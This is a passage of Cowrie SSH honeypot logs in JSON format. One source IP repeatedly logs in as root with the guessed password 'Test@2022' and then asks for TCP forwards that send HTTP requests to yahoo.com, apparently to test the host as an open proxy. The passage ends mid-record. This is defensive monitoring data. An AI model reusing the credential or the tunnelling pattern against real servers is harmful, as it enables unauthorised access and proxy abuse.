{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":20557,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20557","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.937363Z","session":"962b97c35c68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:40.984411Z","src_ip":"213.209.150.239","session":"962b97c35c68"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.032161Z","src_ip":"213.209.150.239","session":"962b97c35c68"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53073,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab8f513d850f","protocol":"ssh","message":"New connection: 213.209.150.239:53073 (1.2.3.4:22) [session: ab8f513d850f]","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.078394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.079198Z","src_ip":"213.209.150.239","session":"ab8f513d850f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.126221Z","src_ip":"213.209.150.239","session":"ab8f513d850f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.360728Z","src_ip":"213.209.150.239","session":"ab8f513d850f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":1614,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1614","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.408561Z","session":"ab8f513d850f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.455585Z","src_ip":"213.209.150.239","session":"ab8f513d850f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4764,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4764","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.589588Z","session":"ab8f513d850f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.636634Z","src_ip":"213.209.150.239","session":"ab8f513d850f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.684831Z","src_ip":"213.209.150.239","session":"ab8f513d850f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53111,"dst_ip":"1.2.3.4","dst_port":22,"session":"38298cb1af52","protocol":"ssh","message":"New connection: 213.209.150.239:53111 (1.2.3.4:22) [session: 38298cb1af52]","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.731015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.731863Z","src_ip":"213.209.150.239","session":"38298cb1af52"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:41.778893Z","src_ip":"213.209.150.239","session":"38298cb1af52"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.014032Z","src_ip":"213.209.150.239","session":"38298cb1af52"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29240,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29240","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.061978Z","session":"38298cb1af52"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.109848Z","src_ip":"213.209.150.239","session":"38298cb1af52"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":8966,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8966","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.245533Z","session":"38298cb1af52"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.292622Z","src_ip":"213.209.150.239","session":"38298cb1af52"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.340932Z","src_ip":"213.209.150.239","session":"38298cb1af52"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53157,"dst_ip":"1.2.3.4","dst_port":22,"session":"03d6951ad34a","protocol":"ssh","message":"New connection: 213.209.150.239:53157 (1.2.3.4:22) [session: 03d6951ad34a]","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.387086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.388067Z","src_ip":"213.209.150.239","session":"03d6951ad34a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.435240Z","src_ip":"213.209.150.239","session":"03d6951ad34a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.671231Z","src_ip":"213.209.150.239","session":"03d6951ad34a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":4467,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4467","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.719258Z","session":"03d6951ad34a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.766680Z","src_ip":"213.209.150.239","session":"03d6951ad34a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10343,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10343","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.901561Z","session":"03d6951ad34a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.949100Z","src_ip":"213.209.150.239","session":"03d6951ad34a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:42.997237Z","src_ip":"213.209.150.239","session":"03d6951ad34a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53206,"dst_ip":"1.2.3.4","dst_port":22,"session":"69f358c44172","protocol":"ssh","message":"New connection: 213.209.150.239:53206 (1.2.3.4:22) [session: 69f358c44172]","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.043392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.044033Z","src_ip":"213.209.150.239","session":"69f358c44172"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.091427Z","src_ip":"213.209.150.239","session":"69f358c44172"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.325949Z","src_ip":"213.209.150.239","session":"69f358c44172"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15820,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15820","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.374029Z","session":"69f358c44172"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.421251Z","src_ip":"213.209.150.239","session":"69f358c44172"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10278,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10278","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.557628Z","session":"69f358c44172"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.605247Z","src_ip":"213.209.150.239","session":"69f358c44172"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.653560Z","src_ip":"213.209.150.239","session":"69f358c44172"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53244,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b625e20ec0a","protocol":"ssh","message":"New connection: 213.209.150.239:53244 (1.2.3.4:22) [session: 5b625e20ec0a]","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.709286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.710392Z","src_ip":"213.209.150.239","session":"5b625e20ec0a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:43.766976Z","src_ip":"213.209.150.239","session":"5b625e20ec0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.049215Z","src_ip":"213.209.150.239","session":"5b625e20ec0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28179,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28179","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.106915Z","session":"5b625e20ec0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.163789Z","src_ip":"213.209.150.239","session":"5b625e20ec0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18095,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18095","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.318970Z","session":"5b625e20ec0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.376506Z","src_ip":"213.209.150.239","session":"5b625e20ec0a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.433718Z","src_ip":"213.209.150.239","session":"5b625e20ec0a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53284,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ed0ab0cfcec","protocol":"ssh","message":"New connection: 213.209.150.239:53284 (1.2.3.4:22) [session: 8ed0ab0cfcec]","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.479698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:44.480604Z","src_ip":"213.209.150.239","session":"8ed0ab0cfcec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-n